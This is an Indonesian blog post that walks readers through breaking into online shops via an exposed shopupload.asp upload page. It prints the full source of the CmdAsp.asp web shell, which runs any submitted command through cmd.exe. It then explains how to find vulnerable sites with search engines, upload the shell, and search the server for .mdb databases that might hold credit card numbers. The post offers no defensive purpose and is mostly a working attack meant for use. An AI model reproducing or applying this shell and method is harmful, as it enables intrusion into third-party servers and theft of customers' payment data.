Searching...
Jumat, 25 Februari 2011

Hack Website Shopping With shopupload.asp


Hmmm, sebelumnya mungkin saya harus berterima kasih dulu kepada kawan saya Co_BaiN  yang telah mengajarkan saya tentang hal ini dan kemudian mulai saya kembangkan sendiri mengenai teknik ini berdasarkan buku “WEB HACKING” karangan Stuart McClure ,Saumil Shah dan Shreerajshah ☺☺☺.

Sebenarnya teknik ini mudah banget lho, gak percaya ??? Bahkan hampir semudah semudah copy-paste di bug web folder hanya saya di sini ada dituntut untuk memahami command-command DOS (no unix command here !!!) lebih banyak, atau paling tidak sedikitlah.


Hmm... mungkin ada yang harus saya ingatkan, walau judul artikel kali ini adalah “HACK WEBSITE SHOPPING WITH shopupload.ASP” tetapi menulis tidak ingin membahas bagaimana mencari Credit Card di sini, karena apa ???

Yah, karena saya sendiri cenderung malas untuk mencari cc sendiri, mending minta pasteannya aja ama kawan :P~ prêt !!! Nah, lalu bagaimana langkah selanjutnya ????

Langkah pertama adalah silahkan copy-kan script ASP yang saya dapatkan dari site securiteam.com berikut ini lalu di save dengan nama terserah anda yang penting ekstensinya adalah asp, sebagai contoh anda simpan saja script ASP ini dengan nama beben.asp :

---------------------=[ cut here the code ]=---------------------
<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Eksekusi Perintah">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
<-- CmdAsp.asp -->
---------------------=[ cut here the code ]=---------------------
Huff..., gimana ??? banyak banget ya codenya ???  ☺☺☺.

Oh iya hampir lupa, langkah selanjutnya yah ??? hmmm anda bisa mencari target di google atau di search engine kesayangan anda, terus masukkan keywords yang kira-kira akan mengarahkan anda ke web yang memiliki file shopupload.asp (saya tak sengaja menemukannya ketika mencoba-coba mencari shopdbtest.asp kemudia ketika saya menghapus nama file shopdbtest.asp eh ternyata tuh site bisa di browsing directory, nah kemudian saya menemukan file shopupload.asp ini :P~ )

Nah, setelah menemukan file tersebut, sekarang anda bisa mengupload file kesayangan anda ke target ☺☺☺ dan dalam contoh kali ini kita akan mengcopy file beben.asp yang berisi file-file jahat untuk mengeksekusi comamnd-command di target ☺☺☺ dan alngkah selanjutnya adalah hak anda tersendiri untuk melakukannya.

Hm... jika anda ingin mencari cc di target, silahkan aja anda ketik command berikut :

Dir *.mdb /s

Command itu berguna untuk mencari file-file yang berekstensi .mdb di seluruh pc korban, siapa tau ada beberapa file menarik yang berisi cc di dalamnya. Lalu untuk men-downloadnya, hehehe... silahkan cari sendiri caranya, saya gak mau ikutan dapat dosa kolektif atas penyalahgunaan cc yang anda dapat tersebut ☺☺☺

Sekian artikel ini saya buat, semoga ente merimanya dengan lapang dada.

0 comments:

Posting Komentar

Like & Share :


Mari budayakan berkomentar baik berupa Kritik, Saran, maupun Pertanyaan untuk menjadikan blog ini lebih baik ke depannya. Copy-Paste di ijinkan, tapi URL sumbernya disertakan.
Terima Kasih.

 
Back to top!